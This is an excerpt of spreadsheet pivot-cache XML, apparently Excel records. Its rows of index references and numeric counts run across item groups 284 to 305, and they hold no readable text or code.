  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="284"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="284"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="284"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="284"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="284"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="284"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="284"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="284"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="284"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="284"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="31"/>
    <x v="284"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="284"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="285"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="285"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="285"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="285"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="285"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="285"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="18"/>
    <x v="285"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="285"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="285"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="285"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="34"/>
    <x v="285"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="32"/>
    <x v="285"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="285"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="285"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="286"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="286"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="286"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="286"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="286"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="286"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="26"/>
    <x v="286"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="23"/>
    <x v="286"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="286"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="286"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="286"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="286"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="286"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="286"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="287"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="287"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="287"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="287"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="287"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="287"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="287"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="287"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="287"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="287"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="287"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="287"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="287"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="287"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="288"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="288"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="288"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="288"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="289"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="289"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="289"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="289"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="290"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="290"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="290"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="290"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="290"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="290"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="290"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="290"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="290"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="290"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="13"/>
    <x v="290"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="67"/>
    <x v="290"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="290"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="290"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="291"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="291"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="291"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="291"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="291"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="291"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="291"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="291"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="291"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="291"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="291"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="291"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="291"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="291"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="292"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="292"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="292"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="292"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="292"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="292"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="292"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="14"/>
    <x v="292"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="292"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="292"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="292"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="292"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="292"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="292"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="293"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="293"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="293"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="293"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="293"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="293"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="293"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="293"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="293"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="293"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="50"/>
    <x v="293"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="719"/>
    <x v="293"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="293"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="293"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="294"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="294"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="294"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="294"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="294"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="294"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="294"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="294"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="294"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="294"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="294"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="294"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="294"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="294"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="295"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="295"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="295"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="295"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="28"/>
    <x v="295"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="295"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="14"/>
    <x v="295"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="295"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="295"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="295"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="295"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="295"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="295"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="295"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="296"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="296"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="296"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="296"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="296"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="296"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="296"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="12"/>
    <x v="296"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="296"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="296"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="75"/>
    <x v="296"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="85"/>
    <x v="296"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="296"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="296"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="297"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="297"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="297"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="297"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="297"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="297"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="23"/>
    <x v="297"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="50"/>
    <x v="297"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="297"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="297"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="297"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="297"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="297"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="297"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="298"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="298"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="298"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="298"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="299"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="299"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="299"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="299"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="300"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="301"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="301"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="301"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="301"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="301"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="301"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="301"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="301"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="301"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="301"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="301"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="301"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="301"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="301"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="302"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="302"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="302"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="303"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="303"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="303"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="303"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="303"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="304"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="304"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="304"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="304"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="304"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="304"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="304"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="304"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="304"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="304"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="23"/>
    <x v="304"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="39"/>
    <x v="304"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="304"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="304"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="305"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="305"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="305"/>
  </r>
